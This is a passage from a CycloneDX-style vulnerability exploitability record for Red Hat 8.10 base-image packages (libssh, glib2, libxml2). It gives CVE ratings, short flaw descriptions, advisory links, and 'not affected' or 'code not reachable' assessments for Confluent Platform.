              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-0988",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A flaw was found in glib. Missing validation of offset and count parameters in the g_buffered_input_stream_peek() function can lead to an integer overflow during length calculation. When specially crafted values are provided, this overflow results in an incorrect size being passed to memcpy(), triggering a buffer overflow. This can cause application crashes, leading to a Denial of Service (DoS).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0988"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7461"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0988"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429886"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3851"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0988"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7971-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0988"
        }
      ],
      "published": "2026-01-21T12:15:55+00:00",
      "updated": "2026-06-17T10:11:43+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-0989",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
      "description": "A flaw was identified in the RelaxNG parser of libxml2 related to how external schema inclusions are handled. The parser does not enforce a limit on inclusion depth when resolving nested <include> directives. Specially crafted or overly complex schemas can cause excessive recursion during parsing. This may lead to stack exhaustion and application crashes, creating a denial-of-service risk.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0989"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0989"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429933"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/998"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/merge_requests/374"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0989"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7974-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0989"
        }
      ],
      "published": "2026-01-15T15:15:52+00:00",
      "updated": "2026-06-30T20:20:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.9.7-21.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-0990",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
      "description": "A flaw was found in libxml2, an XML parsing library. This uncontrolled recursion vulnerability occurs in the xmlCatalogXMLResolveURI function when an XML catalog contains a delegate URI entry that references itself. A remote attacker could exploit this configuration-dependent issue by providing a specially crafted XML catalog, leading to infinite recursion and call stack exhaustion. This ultimately results in a segmentation fault, causing a Denial of Service (DoS) by crashing affected applications.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0990"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0990"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429959"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1018"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0990"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7974-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0990"
        }
      ],
      "published": "2026-01-15T15:15:52+00:00",
      "updated": "2026-06-30T20:18:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.9.7-21.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-0992",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400
      ],
      "description": "A flaw was found in the libxml2 library. This uncontrolled resource consumption vulnerability occurs when processing XML catalogs that contain repeated <nextCatalog> elements pointing to the same downstream catalog. A remote attacker can exploit this by supplying crafted catalogs, causing the parser to redundantly traverse catalog chains. This leads to excessive CPU consumption and degrades application availability, resulting in a denial-of-service condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0992"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0992"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429975"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1019"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0992"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7974-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0992"
        }
      ],
      "published": "2026-01-15T15:15:52+00:00",
      "updated": "2026-06-30T20:17:25+00:00",
      "affects": [
        {
